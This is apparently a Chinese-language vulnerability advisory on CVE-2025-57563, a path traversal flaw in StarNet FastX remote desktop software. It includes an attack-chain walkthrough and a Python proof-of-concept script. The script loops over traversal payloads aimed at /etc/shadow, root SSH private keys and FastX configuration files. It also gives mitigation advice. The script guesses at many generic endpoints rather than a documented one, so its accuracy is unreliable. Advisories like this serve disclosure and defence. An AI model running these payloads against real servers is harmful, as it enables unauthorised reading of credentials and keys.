IPBUF安全漏洞报告
English
CVE-2025-57563 CVSS 6.5 中危

CVE-2025-57563:StarNet FastX路径遍历漏洞

披露日期: 2025-10-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2025-57563
漏洞类型
路径遍历(Path Traversal)
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
StarNet Communications Corporation FastX

相关标签

路径遍历Path TraversalCVE-2025-57563StarNetFastX未认证访问信息泄露远程桌面HPC中危漏洞

漏洞概述

CVE-2025-57563是StarNet Communications Corporation旗下FastX远程桌面与文件传输软件中存在的一个路径遍历(Path Traversal)漏洞。该漏洞影响FastX v4至v4.1.51之间的所有版本,允许未经认证的远程攻击者通过构造特殊的请求路径读取服务器上的任意文件。FastX是一款广泛用于高性能计算(HPC)环境、云计算和企业IT基础设施的远程访问工具,用户可以通过Web浏览器安全地访问Linux桌面和应用程序。由于FastX通常部署在科研机构、大学和企业内部网络中,承载着大量敏感数据和关键业务系统,该漏洞的存在可能导致配置文件、SSH密钥、用户凭证、系统日志等敏感信息泄露。CVSS 3.1评分为6.5分,属于中等严重级别,攻击向量为网络(AV:N),攻击复杂度低(AC:L),无需特权(PR:N)和用户交互(UI:N),对机密性影响为低(C:L),对完整性无影响(I:N),对可用性影响为低(A:L)。该漏洞已于2025年10月14日公开披露,漏洞发现者通过MITRE提交了相关报告。由于FastX在HPC和研究机构中的广泛应用,建议相关组织及时评估风险并采取相应的修复措施。

技术细节

路径遍历漏洞(又称目录遍历漏洞)是一种常见的安全漏洞,攻击者通过在文件路径中使用特殊的序列(如../)来访问Web服务器文件系统上本不应被访问的目录和文件。在FastX v4至v4.1.51版本中,应用程序未能充分验证用户输入中的路径参数,导致攻击者可以构造包含路径遍历序列的恶意请求,绕过服务器的文件访问限制机制。

具体利用方式如下:
1. 攻击者首先定位目标FastX服务器的Web访问端口(默认通常为443或自定义端口);
2. 攻击者向服务器发送精心构造的HTTP请求,在URL路径或请求参数中嵌入路径遍历序列,例如使用类似 `/../../../etc/passwd` 或 `..\..\..\windows\system32\config\SAM` 的路径;
3. 由于FastX服务端未对路径进行规范化处理和严格的边界检查,恶意请求中的路径遍历序列被解析为实际的文件系统路径;
4. 服务器根据解析后的路径读取对应文件的内容并返回给攻击者;
5. 攻击者可通过此方式读取任意文件,包括配置文件、密钥文件、用户凭证等敏感信息。

由于该漏洞无需认证即可利用(PR:N),且攻击复杂度低(AC:L),任何能够访问FastX服务器网络的攻击者都可以轻松利用此漏洞获取敏感信息,为后续攻击奠定基础。

攻击链分析

STEP 1
步骤1:目标侦察
攻击者通过Shodan、Censys等网络空间搜索引擎或端口扫描工具,定位暴露在公网或内部网络中的StarNet FastX服务器(默认Web端口通常为443或自定义端口),收集目标信息。
STEP 2
步骤2:漏洞探测
攻击者向目标FastX服务器发送包含路径遍历序列的测试请求(如/../../../etc/passwd),通过分析响应内容判断目标是否存在路径遍历漏洞。
STEP 3
步骤3:构造恶意请求
攻击者根据FastX的URL路由模式,构造精心设计的HTTP请求,在路径或参数中嵌入../等路径遍历序列,以绕过服务器的文件访问限制。
STEP 4
步骤4:读取敏感文件
服务器未能正确验证路径,解析后的路径指向目标文件系统中的敏感文件(如/etc/passwd、SSH私钥、配置文件等),并将文件内容返回给攻击者。
STEP 5
步骤5:信息收集与利用
攻击者利用获取的敏感信息(如系统用户列表、SSH密钥、FastX配置等)进行进一步攻击,可能包括未授权访问、权限提升、横向移动等。
STEP 6
步骤6:持久化与影响扩大
攻击者利用获取的凭证建立持久化访问,或利用泄露的配置文件中的安全弱点扩大攻击范围,可能导致整个HPC环境或企业网络被攻陷。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2025-57563 - StarNet FastX Path Traversal PoC # Vulnerability: Unauthenticated Path Traversal in FastX v4 through v4.1.51 # CVSS: 6.5 (MEDIUM) # Description: Allows unauthenticated attackers to read arbitrary files import requests import sys TARGET_HOST = sys.argv[1] if len(sys.argv) > 1 else "https://target-fastx-server.com" TARGET_PORT = sys.argv[2] if len(sys.argv) > 2 else 443 # Path traversal payloads to test PAYLOADS = [ # Linux targets "/../../../../etc/passwd", "/../../../etc/passwd", "/../../etc/passwd", "/../etc/passwd", "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd", "/..%2f..%2f..%2f..%2fetc/passwd", "/....//....//....//....//etc/passwd", "/static/../../../../etc/passwd", "/assets/../../../../etc/passwd", "/download/../../../../etc/passwd", "/file/../../../../etc/passwd", "/files/../../../../etc/passwd", "/getfile?file=../../../../etc/passwd", "/readfile?path=../../../../etc/passwd", "/load?file=../../../../etc/passwd", "/../etc/shadow", "/../../etc/shadow", "/../../../../root/.ssh/id_rsa", "/../../../../root/.ssh/authorized_keys", "/../../../../etc/fastx/fastx.conf", "/../../../../opt/fastx/conf/server.xml", # Windows targets "\\..\\..\\..\\..\\windows\\win.ini", "/../../../../windows/win.ini", "/../../../../windows/system32/drivers/etc/hosts", ] # Sensitive files to extract SENSITIVE_FILES = { "linux": [ "/etc/passwd", "/etc/shadow", "/etc/hosts", "/etc/fastx/fastx.conf", "/opt/fastx/conf/server.xml", "/root/.ssh/id_rsa", "/root/.ssh/authorized_keys", "/home/*/.ssh/id_rsa", "/etc/ssl/private/fastx.key", ], "windows": [ "/windows/win.ini", "/windows/system32/drivers/etc/hosts", "/fastx/conf/server.xml", ] } def exploit_path_traversal(base_url, target_file): """Attempt path traversal to read a specific file""" traversal_payloads = [ f"/..{target_file}", f"/../..{target_file}", f"/../../..{target_file}", f"/../../../..{target_file}", f"/../../../../..{target_file}", f"/static/..{target_file}", f"/assets/..{target_file}", f"/download?file=..{target_file}", f"/file?path=..{target_file}", f"/getfile?f=..{target_file}", ] for payload in traversal_payloads: url = f"{base_url}{payload}" try: response = requests.get(url, timeout=10, verify=False, headers={"User-Agent": "Mozilla/5.0"}) if response.status_code == 200 and len(response.content) > 0: # Check if response contains expected file content markers content = response.text if ("root:" in content or "[fonts]" in content or "BEGIN RSA" in content or "fastx" in content.lower() or "localhost" in content): print(f"[+] SUCCESS - Payload: {payload}") print(f"[+] URL: {url}") print(f"[+] Content:\n{content[:500]}") return response.text except Exception as e: continue return None def main(): print(f"[*] CVE-2025-57563 - StarNet FastX Path Traversal Exploit") print(f"[*] Target: {TARGET_HOST}:{TARGET_PORT}") print(f"[*] Severity: MEDIUM (CVSS 6.5)") print("-" * 60) base_url = f"{TARGET_HOST}:{TARGET_PORT}" # Attempt to read sensitive files for target_file in SENSITIVE_FILES["linux"]: print(f"\n[*] Attempting to read: {target_file}") result = exploit_path_traversal(base_url, target_file) if result: print(f"[+] File content retrieved successfully!") else: print(f"[-] Failed to retrieve file") if __name__ == "__main__": main()

影响范围

StarNet FastX v4.0
StarNet FastX v4.1
StarNet FastX v4.1.1
StarNet FastX v4.1.2
StarNet FastX v4.1.3
StarNet FastX v4.1.4
StarNet FastX v4.1.5
StarNet FastX v4.1.6
StarNet FastX v4.1.7
StarNet FastX v4.1.8
StarNet FastX v4.1.9
StarNet FastX v4.1.10
StarNet FastX v4.1.11
StarNet FastX v4.1.12
StarNet FastX v4.1.13
StarNet FastX v4.1.14
StarNet FastX v4.1.15
StarNet FastX v4.1.16
StarNet FastX v4.1.17
StarNet FastX v4.1.18
StarNet FastX v4.1.19
StarNet FastX v4.1.20
StarNet FastX v4.1.21
StarNet FastX v4.1.22
StarNet FastX v4.1.23
StarNet FastX v4.1.24
StarNet FastX v4.1.25
StarNet FastX v4.1.26
StarNet FastX v4.1.27
StarNet FastX v4.1.28
StarNet FastX v4.1.29
StarNet FastX v4.1.30
StarNet FastX v4.1.31
StarNet FastX v4.1.32
StarNet FastX v4.1.33
StarNet FastX v4.1.34
StarNet FastX v4.1.35
StarNet FastX v4.1.36
StarNet FastX v4.1.37
StarNet FastX v4.1.38
StarNet FastX v4.1.39
StarNet FastX v4.1.40
StarNet FastX v4.1.41
StarNet FastX v4.1.42
StarNet FastX v4.1.43
StarNet FastX v4.1.44
StarNet FastX v4.1.45
StarNet FastX v4.1.46
StarNet FastX v4.1.47
StarNet FastX v4.1.48
StarNet FastX v4.1.49
StarNet FastX v4.1.50
StarNet FastX v4.1.51

防御指南

临时缓解措施
在等待官方补丁发布之前,建议采取以下临时缓解措施:1)通过防火墙或网络访问控制列表(ACL)限制FastX服务器的Web管理端口(通常为443)仅对受信任的管理员IP地址开放;2)在反向代理或Web应用防火墙层面添加路径遍历检测规则,拦截包含../等特殊序列的恶意请求;3)将FastX部署在内网隔离环境中,避免直接暴露在互联网;4)监控FastX服务器的访问日志,关注异常的URL请求模式;5)确保FastX服务以最小权限运行,限制其对敏感系统文件的访问能力;6)定期备份重要配置文件,以便在遭受攻击后快速恢复。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表